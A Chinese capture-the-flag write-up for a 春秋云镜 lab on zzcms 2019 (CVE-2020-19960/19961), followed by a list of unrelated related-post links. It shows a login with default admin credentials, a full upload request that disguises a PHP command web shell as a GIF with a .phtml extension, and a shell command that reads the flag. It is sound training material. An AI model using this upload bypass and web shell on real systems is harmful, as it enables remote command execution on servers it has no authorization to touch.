[春秋云镜]CVE-2020-19960,CVE-2020-19961
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag)
春秋云镜开启靶场:
http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/
后台
http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php
账号admin 密码admin
登录进来找上传点
http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadimg_form.php?noshuiyin=1&imgid=2
上传一张图片 修改后缀为.phtml
POST /uploadimg.php HTTP/1.1
Host: eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------193076518811279314343225962366
Content-Length: 664
Origin: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadimg_form.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669902296,1669945756,1669953976,1670045049; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1670050507; __tins__713776=%7B%22sid%22%3A%201670052271753%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201670054071753%7D; __51cke__=; __51laig__=1; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; tablename=zzcms_zsclass
Upgrade-Insecure-Requests: 1-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="g_fu_image[]"; filename="1.phtml"
Content-Type: image/jpegGIF89a
<?php
if($_REQUEST['s']) {system($_REQUEST['s']);} else phpinfo();
?>-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="Submit"提交
-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="noshuiyin"-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="imgid"-----------------------------193076518811279314343225962366--
获取flag
http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadfiles/2022-12/20221203074749583.phtml?s=cat%20../../../../../../../../flag
[春秋云镜]CVE-2020-19960,CVE-2020-19961相关推荐
- 春秋云镜wp day1
春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...
- 春秋云镜 CVE-2022-24223
春秋云镜 CVE-2022-24223 AtomCMS SQL注入漏洞 靶标介绍 Elite Graphix Elite Cms是印度Elite Graphix公司的一个用 Php 语言编写的 Web ...
- 心音数据库_小V云端数据库 | 2020.9.14—2020.9.18
桂花的芬芳 在雨后空气中弥散开来 似为湿润的情绪 赠予了一丝甜蜜 小V云端数据库 2020.9.14-2020.9.18 资讯情报关键词 健康.示范.安全 V宝体检,助力成长 2020年9月14日上午 ...
- 从ICLR 2020、AAAI 2020看对话系统近期研究进展
©PaperWeekly 原创 · 作者|王馨月 学校|四川大学本科生 研究方向|自然语言处理 本文盘点近期 ICLR 2020.AAAI 2020 上几篇对话系统相关的论文. ICLR 2020 论 ...
- [春秋云镜]CVE-2022-23134
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zabbix Sia Zabbix是拉脱 ...
- 从ACL 2020和ICLR 2020看知识图谱嵌入的近期研究进展
©PaperWeekly 原创 · 作者|舒意恒 学校|南京大学硕士生 研究方向|知识图谱 本文介绍三篇发表于 ACL 2020 或 ICLR 2020 关于知识图谱嵌入的近期研究进展. 1. ACL ...
- 【春秋云镜 CVE-2022-30887wp】
春秋云镜 CVE-2022-30887wp 开始愉快的打靶之旅吧 收集信息 任意文件上传 开始愉快的打靶之旅吧 春秋云镜链接 https://yunjing.ichunqiu.com 靶标介绍: 多语 ...
- [春秋云镜]CVE-2022-23043
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zenario CMS 9.2 文件上传 ...
- [春秋云镜]CVE-2022-2073
声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...
最新文章
- Python3 与 C# 面向对象之~封装
- VMM系列之VMM角色介绍以及创建运行方式账户
- C语言goto关键字—尽量少用
- mysql 主从 跳过_mysql主从同步如何跳过错误
- 开源一款超实用的 Dubbo 测试工具,已用半年,感觉很有feel~
- 汉语言文学专业c学校,哪个学校汉语言文学专业最好?有哪些录取要求最低分数线是多少?...
- 数据库索引为什么用B+树实现?
- win10下安装Mysql5.7
- 传动系统结构简图_液压传动系统结构示意图画图技巧(攻略)
- 用mindspore写了一个decouplehead模块,在yolov5上使用时报错
- c语言大一期中考试知识点,大一期末考试复习计划
- 2016英语三级分数计算机,公共英语三级考试分数权重计算方法
- Foxmail登录各种邮箱方法汇总
- js逆向学习路线指南
- Typescript浅尝
- 跌倒检测_使用姿势估计的跌倒检测
- 大学物理实验 基本量的测量
- 论基于DSSA的软件架构设计与应用
- 杭州电子科技大学全国计算机排名,杭电排名为什么比211还高,杭州电子科技大学是211吗...
- Mysql报文理解mtu拆包依据(tso/gro)